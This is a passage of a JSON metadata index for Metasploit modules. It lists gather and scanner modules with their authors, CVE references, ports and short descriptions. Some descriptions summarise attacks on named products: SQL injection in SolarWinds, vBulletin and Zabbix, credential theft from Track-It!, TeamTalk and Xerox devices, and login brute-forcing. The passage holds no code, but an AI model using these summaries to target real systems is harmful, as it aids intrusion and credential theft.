],
"targets": null,
"mod_time": "2017-12-16 22:10:02 +0000",
"path": "/modules/auxiliary/gather/samsung_browser_sop_bypass.rb",
"is_install_path": true,
"ref_name": "gather/samsung_browser_sop_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/search_email_collector": {
"name": "Search Engine Domain Email Address Collector",
"full_name": "auxiliary/gather/search_email_collector",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module uses Google, Bing and Yahoo to create a list of\n valid email addresses for the target domain.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/search_email_collector.rb",
"is_install_path": true,
"ref_name": "gather/search_email_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/searchengine_subdomains_collector": {
"name": "Search Engine Subdomains Collector",
"full_name": "auxiliary/gather/searchengine_subdomains_collector",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "This module can be used to gather subdomains about a domain\n from Yahoo, Bing.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 04:43:03 +0000",
"path": "/modules/auxiliary/gather/searchengine_subdomains_collector.rb",
"is_install_path": true,
"ref_name": "gather/searchengine_subdomains_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/shodan_honeyscore": {
"name": "Shodan Honeyscore Client",
"full_name": "auxiliary/gather/shodan_honeyscore",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"thecarterb"
],
"description": "This module uses the shodan API to check\n if a server is a honeypot or not. The api\n returns a score from 0.0 to 1.0. 1.0 being a honeypot.\n A shodan API key is needed for this module to work properly.\n\n If you don't have an account, go here to register:\n https://account.shodan.io/register\n For more info on how their honeyscore system works, go here:\n https://honeyscore.shodan.io/",
"references": [
"URL-https://honeyscore.shodan.io/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:41:41 +0000",
"path": "/modules/auxiliary/gather/shodan_honeyscore.rb",
"is_install_path": true,
"ref_name": "gather/shodan_honeyscore",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/shodan_search": {
"name": "Shodan Search",
"full_name": "auxiliary/gather/shodan_search",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"John H Sawyer <john@sploitlab.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module uses the Shodan API to search Shodan. Accounts are free\n and an API key is required to use this module. Output from the module\n is displayed to the screen and can be saved to a file or the MSF database.\n NOTE: SHODAN filters (i.e. port, hostname, os, geo, city) can be used in\n queries, but there are limitations when used with a free API key. Please\n see the Shodan site for more information.\n Shodan website: https://www.shodan.io/\n API: https://developer.shodan.io/api",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:41:41 +0000",
"path": "/modules/auxiliary/gather/shodan_search.rb",
"is_install_path": true,
"ref_name": "gather/shodan_search",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/snare_registry": {
"name": "Snare Lite for Windows Registry Access",
"full_name": "auxiliary/gather/snare_registry",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses the Registry Dump feature of the Snare Lite\n for Windows service on 6161/TCP to retrieve the Windows registry.\n The Dump Registry functionality is unavailable in Snare Enterprise.\n\n Note: The Dump Registry functionality accepts only one connected\n client at a time. Requesting a large key/hive will cause the service\n to become unresponsive until the server completes the request.",
"references": [
"URL-https://www.intersectalliance.com/wp-content/uploads/user_guides/Guide_to_Snare_for_Windows-4.2.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 6161,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/gather/snare_registry.rb",
"is_install_path": true,
"ref_name": "gather/snare_registry",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/solarwinds_orion_sqli": {
"name": "Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation",
"full_name": "auxiliary/gather/solarwinds_orion_sqli",
"rank": 300,
"disclosure_date": "2015-02-24",
"type": "auxiliary",
"author": [
"Brandon Perry"
],
"description": "This module exploits a stacked SQL injection in order to add an administrator user to the\n SolarWinds Orion database.",
"references": [
"CVE-2014-9566"
],
"platform": "",
"arch": "",
"rport": 8787,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/solarwinds_orion_sqli.rb",
"is_install_path": true,
"ref_name": "gather/solarwinds_orion_sqli",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/ssllabs_scan": {
"name": "SSL Labs API Client",
"full_name": "auxiliary/gather/ssllabs_scan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Denis Kolegov <dnkolegov@gmail.com>",
"Francois Chagnon"
],
"description": "This module is a simple client for the SSL Labs APIs, designed for\n SSL/TLS assessment during a penetration test.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-01-22 16:32:16 +0000",
"path": "/modules/auxiliary/gather/ssllabs_scan.rb",
"is_install_path": true,
"ref_name": "gather/ssllabs_scan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/teamtalk_creds": {
"name": "TeamTalk Gather Credentials",
"full_name": "auxiliary/gather/teamtalk_creds",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module retrieves user credentials from BearWare TeamTalk.\n\n Valid administrator credentials are required.\n\n This module has been tested successfully on TeamTalk versions\n 5.2.2.4885 and 5.2.3.4893.",
"references": [
"URL-https://github.com/BearWare/TeamTalk5/blob/master/ttphpadmin/tt5admin.php"
],
"platform": "",
"arch": "",
"rport": 10333,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/gather/teamtalk_creds.rb",
"is_install_path": true,
"ref_name": "gather/teamtalk_creds",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/trackit_sql_domain_creds": {
"name": "BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure",
"full_name": "auxiliary/gather/trackit_sql_domain_creds",
"rank": 300,
"disclosure_date": "2014-10-07",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an unauthenticated configuration retrieval .NET remoting\n service in Numara / BMC Track-It! v9 to v11.X, which can be abused to retrieve the Domain\n Administrator and the SQL server user credentials.\n This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,\n 10.0.0.143 and 9.0.30.248.",
"references": [
"CVE-2014-4872",
"OSVDB-112741",
"US-CERT-VU-121036",
"URL-https://seclists.org/fulldisclosure/2014/Oct/34"
],
"platform": "",
"arch": "",
"rport": 9010,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/trackit_sql_domain_creds.rb",
"is_install_path": true,
"ref_name": "gather/trackit_sql_domain_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/vbulletin_vote_sqli": {
"name": "vBulletin Password Collector via nodeid SQL Injection",
"full_name": "auxiliary/gather/vbulletin_vote_sqli",
"rank": 300,
"disclosure_date": "2013-03-24",
"type": "auxiliary",
"author": [
"Orestis Kourides",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a SQL injection vulnerability found in vBulletin 5 that has been\n used in the wild since March 2013. This module can be used to extract the web application's\n usernames and hashes, which could be used to authenticate into the vBulletin admin control\n panel.",
"references": [
"CVE-2013-3522",
"OSVDB-92031",
"EDB-24882",
"BID-58754",
"URL-http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/vbulletin_vote_sqli.rb",
"is_install_path": true,
"ref_name": "gather/vbulletin_vote_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/windows_deployment_services_shares": {
"name": "Microsoft Windows Deployment Services Unattend Gatherer",
"full_name": "auxiliary/gather/windows_deployment_services_shares",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will search remote file shares for unattended installation files that may contain\n domain credentials. This is often used after discovering domain credentials with the\n auxiliary/scanner/dcerpc/windows_deployment_services module or in cases where you already\n have domain credentials. This module will connect to the RemInst share and any Microsoft\n Deployment Toolkit shares indicated by the share name comments.",
"references": [
"MSDN-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx",
"URL-http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:41:41 +0000",
"path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb",
"is_install_path": true,
"ref_name": "gather/windows_deployment_services_shares",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/wp_all_in_one_migration_export": {
"name": "WordPress All-in-One Migration Export",
"full_name": "auxiliary/gather/wp_all_in_one_migration_export",
"rank": 300,
"disclosure_date": "2015-03-19",
"type": "auxiliary",
"author": [
"James Golovich",
"rastating"
],
"description": "This module allows you to export Wordpress data (such as the database, plugins, themes,\n uploaded files, etc) via the All-in-One Migration plugin without authentication.",
"references": [
"WPVDB-7857",
"URL-http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/auxiliary/gather/wp_all_in_one_migration_export.rb",
"is_install_path": true,
"ref_name": "gather/wp_all_in_one_migration_export",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/wp_ultimate_csv_importer_user_extract": {
"name": "WordPress Ultimate CSV Importer User Table Extract",
"full_name": "auxiliary/gather/wp_ultimate_csv_importer_user_extract",
"rank": 300,
"disclosure_date": "2015-02-02",
"type": "auxiliary",
"author": [
"James Hooker",
"rastating"
],
"description": "Due to lack of verification of a visitor's permissions, it is possible\n to execute the 'export.php' script included in the default installation of the\n Ultimate CSV Importer plugin and retrieve the full contents of the user table\n in the WordPress installation. This results in full disclosure of usernames,\n hashed passwords and email addresses for all users.",
"references": [
"WPVDB-7778"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb",
"is_install_path": true,
"ref_name": "gather/wp_ultimate_csv_importer_user_extract",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/wp_w3_total_cache_hash_extract": {
"name": "WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract",
"full_name": "auxiliary/gather/wp_w3_total_cache_hash_extract",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christian Mehlmauer <FireFart@gmail.com>",
"Jason A. Donenfeld <Jason@zx2c4.com>"
],
"description": "The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements\n and its results in files for fast access. Version 0.9.2.4 has been fixed afterwards\n so it can be vulnerable. These cache files are in the webroot of the Wordpress\n installation and can be downloaded if the name is guessed. This module tries to\n locate them with brute force in order to find usernames and password hashes in these\n files. W3 Total Cache must be configured with Database Cache enabled and Database\n Cache Method set to Disk to be vulnerable",
"references": [
"OSVDB-88744",
"URL-https://seclists.org/fulldisclosure/2012/Dec/242",
"WPVDB-6621"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb",
"is_install_path": true,
"ref_name": "gather/wp_w3_total_cache_hash_extract",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/xbmc_traversal": {
"name": "XBMC Web Server Directory Traversal",
"full_name": "auxiliary/gather/xbmc_traversal",
"rank": 300,
"disclosure_date": "2012-11-04",
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"Lucas \"acidgen\" Lundgren IOActive",
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module exploits a directory traversal bug in XBMC 11, up until the\n 2012-11-04 nightly build. The module can only be used to retrieve files.",
"references": [
"URL-http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348",
"URL-https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335",
"URL-http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/xbmc_traversal.rb",
"is_install_path": true,
"ref_name": "gather/xbmc_traversal",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/xerox_pwd_extract": {
"name": "Xerox Administrator Console Password Extractor",
"full_name": "auxiliary/gather/xerox_pwd_extract",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"Percentx\" Heiland",
"Pete \"Bokojan\" Arzamendi"
],
"description": "This module will extract the management console's admin password from the\n Xerox file system using firmware bootstrap injection.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/xerox_pwd_extract.rb",
"is_install_path": true,
"ref_name": "gather/xerox_pwd_extract",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/xerox_workcentre_5xxx_ldap": {
"name": "Xerox Workcentre 5735 LDAP Service Redential Extractor",
"full_name": "auxiliary/gather/xerox_workcentre_5xxx_ldap",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"Percentx\" Heiland",
"Pete \"Bokojan\" Arzamendi"
],
"description": "This module extract the printer's LDAP username and password from Xerox Workcentre 5735.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb",
"is_install_path": true,
"ref_name": "gather/xerox_workcentre_5xxx_ldap",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/zabbix_toggleids_sqli": {
"name": "Zabbix toggle_ids SQL Injection",
"full_name": "auxiliary/gather/zabbix_toggleids_sqli",
"rank": 300,
"disclosure_date": "2016-08-11",
"type": "auxiliary",
"author": [
"1n3 <1n3@hushmail.com>",
"bperry"
],
"description": "This module will exploit a SQL injection in Zabbix 3.0.3 and\n likely prior in order to save the current usernames and\n password hashes from the database to a JSON file.",
"references": [
"CVE-2016-10134",
"URL-https://seclists.org/fulldisclosure/2016/Aug/60"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/zabbix_toggleids_sqli.rb",
"is_install_path": true,
"ref_name": "gather/zabbix_toggleids_sqli",
"check": true,
"post_auth": false,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/zoomeye_search": {
"name": "ZoomEye Search",
"full_name": "auxiliary/gather/zoomeye_search",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "The module use the ZoomEye API to search ZoomEye. ZoomEye is a search\n engine for cyberspace that lets the user find specific network\n components(ip, services, etc.).",
"references": [
"URL-https://github.com/zoomeye/SDK",
"URL-https://www.zoomeye.org/api/doc",
"URL-https://www.zoomeye.org/help/manual"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:41:41 +0000",
"path": "/modules/auxiliary/gather/zoomeye_search.rb",
"is_install_path": true,
"ref_name": "gather/zoomeye_search",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_parser/unattend": {
"name": "Auxilliary Parser Windows Unattend Passwords",
"full_name": "auxiliary/parser/unattend",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module parses Unattend files in the target directory.\n\n See also: post/windows/gather/enum_unattend",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ff715801",
"URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx",
"URL-http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/parser/unattend.rb",
"is_install_path": true,
"ref_name": "parser/unattend",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_pdf/foxit/authbypass": {
"name": "Foxit Reader Authorization Bypass",
"full_name": "auxiliary/pdf/foxit/authbypass",
"rank": 300,
"disclosure_date": "2009-03-09",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits an authorization bypass vulnerability in Foxit Reader\n build 1120. When an attacker creates a specially crafted pdf file containing\n an Open/Execute action, arbitrary commands can be executed without confirmation\n from the victim.",
"references": [
"CVE-2009-0836",
"OSVDB-55615",
"BID-34035"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/pdf/foxit/authbypass.rb",
"is_install_path": true,
"ref_name": "pdf/foxit/authbypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/acpp/login": {
"name": "Apple Airport ACPP Authentication Scanner",
"full_name": "auxiliary/scanner/acpp/login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module attempts to authenticate to an Apple Airport using its\n proprietary and largely undocumented protocol known only as ACPP.",
"references": [
"CVE-2003-0270"
],
"platform": "",
"arch": "",
"rport": 5009,
"autofilter_ports": [
5009
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/acpp/login.rb",
"is_install_path": true,
"ref_name": "scanner/acpp/login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/afp/afp_login": {
"name": "Apple Filing Protocol Login Utility",
"full_name": "auxiliary/scanner/afp/afp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man <man.gregory@gmail.com>"
],
"description": "This module attempts to bruteforce authentication credentials for AFP.",
"references": [
"URL-https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html",
"URL-https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html"
],
"platform": "",
"arch": "",
"rport": 548,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/afp/afp_login.rb",
"is_install_path": true,
"ref_name": "scanner/afp/afp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/afp/afp_server_info": {
"name": "Apple Filing Protocol Info Enumerator",
"full_name": "auxiliary/scanner/afp/afp_server_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man <man.gregory@gmail.com>"
],
"description": "This module fetches AFP server information, including server name,\n network address, supported AFP versions, signature, machine type,\n and server flags.",
"references": [
"URL-https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html"
],
"platform": "",
"arch": "",
"rport": 548,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/afp/afp_server_info.rb",
"is_install_path": true,
"ref_name": "scanner/afp/afp_server_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/backdoor/energizer_duo_detect": {
"name": "Energizer DUO Trojan Scanner",
"full_name": "auxiliary/scanner/backdoor/energizer_duo_detect",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect instances of the Energizer DUO trojan horse software on port 7777",
"references": [
"CVE-2010-0103",
"OSVDB-62782",
"US-CERT-VU-154421"
],
"platform": "",
"arch": "",
"rport": 7777,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb",
"is_install_path": true,
"ref_name": "scanner/backdoor/energizer_duo_detect",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/chargen/chargen_probe": {
"name": "Chargen Probe Utility",
"full_name": "auxiliary/scanner/chargen/chargen_probe",
"rank": 300,
"disclosure_date": "1996-02-08",
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "Chargen is a debugging and measurement tool and a character\n generator service. A character generator service simply sends\n data without regard to the input.\n Chargen is susceptible to spoofing the source of transmissions\n as well as use in a reflection attack vector. The misuse of the\n testing features of the Chargen service may allow attackers to\n craft malicious network payloads and reflect them by spoofing\n the transmission source to effectively direct it to a target.\n This can result in traffic loops and service degradation with\n large amounts of network traffic.",
"references": [
"CVE-1999-0103",
"URL-http://tools.ietf.org/html/rfc864"
],
"platform": "",
"arch": "",
"rport": 19,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/chargen/chargen_probe.rb",
"is_install_path": true,
"ref_name": "scanner/chargen/chargen_probe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/couchdb/couchdb_enum": {
"name": "CouchDB Enum Utility",
"full_name": "auxiliary/scanner/couchdb/couchdb_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Max Justicz",
"Roberto Soares Espreto <robertoespreto@gmail.com>",
"Hendrik Van Belleghem",
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "This module enumerates databases on CouchDB using the REST API\n (without authentication by default).",
"references": [
"CVE-2017-12635",
"URL-https://justi.cz/security/2017/11/14/couchdb-rce-npm.html",
"URL-https://wiki.apache.org/couchdb/HTTP_database_API"
],
"platform": "",
"arch": "",
"rport": 5984,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-01-07 11:18:19 +0000",
"path": "/modules/auxiliary/scanner/couchdb/couchdb_enum.rb",
"is_install_path": true,
"ref_name": "scanner/couchdb/couchdb_enum",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/couchdb/couchdb_login": {
"name": "CouchDB Login Utility",
"full_name": "auxiliary/scanner/couchdb/couchdb_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"espreto <robertoespreto@gmail.com>"
],
"description": "This module tests CouchDB logins on a range of\n machines and report successful logins.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5984,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/couchdb/couchdb_login.rb",
"is_install_path": true,
"ref_name": "scanner/couchdb/couchdb_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/db2/db2_auth": {
"name": "DB2 Authentication Brute Force Utility",
"full_name": "auxiliary/scanner/db2/db2_auth",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module attempts to authenticate against a DB2\n instance using username and password combinations indicated by the\n USER_FILE, PASS_FILE, and USERPASS_FILE options.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 50000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/db2/db2_auth.rb",
"is_install_path": true,
"ref_name": "scanner/db2/db2_auth",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/db2/db2_version": {
"name": "DB2 Probe Utility",
"full_name": "auxiliary/scanner/db2/db2_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module queries a DB2 instance information.",
"references": [
],
"platform": "",
"arch": "",
"rport": 50000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/db2/db2_version.rb",
"is_install_path": true,
"ref_name": "scanner/db2/db2_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/db2/discovery": {
"name": "DB2 Discovery Service Detection",
"full_name": "auxiliary/scanner/db2/discovery",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply queries the DB2 discovery service for information.",
"references": [
],
"platform": "",
"arch": "",
"rport": 523,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/db2/discovery.rb",
"is_install_path": true,
"ref_name": "scanner/db2/discovery",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dcerpc/endpoint_mapper": {
"name": "Endpoint Mapper Service Discovery",
"full_name": "auxiliary/scanner/dcerpc/endpoint_mapper",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to obtain information from the\n Endpoint Mapper service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 135,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb",
"is_install_path": true,
"ref_name": "scanner/dcerpc/endpoint_mapper",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dcerpc/hidden": {
"name": "Hidden DCERPC Service Discovery",
"full_name": "auxiliary/scanner/dcerpc/hidden",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module will query the endpoint mapper and make a list\n of all ncacn_tcp RPC services. It will then connect to each of\n these services and use the management API to list all other\n RPC services accessible on this port. Any RPC service found attached\n to a TCP port, but not listed in the endpoint mapper, will be displayed\n and analyzed to see whether anonymous access is permitted.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 04:43:37 +0000",
"path": "/modules/auxiliary/scanner/dcerpc/hidden.rb",
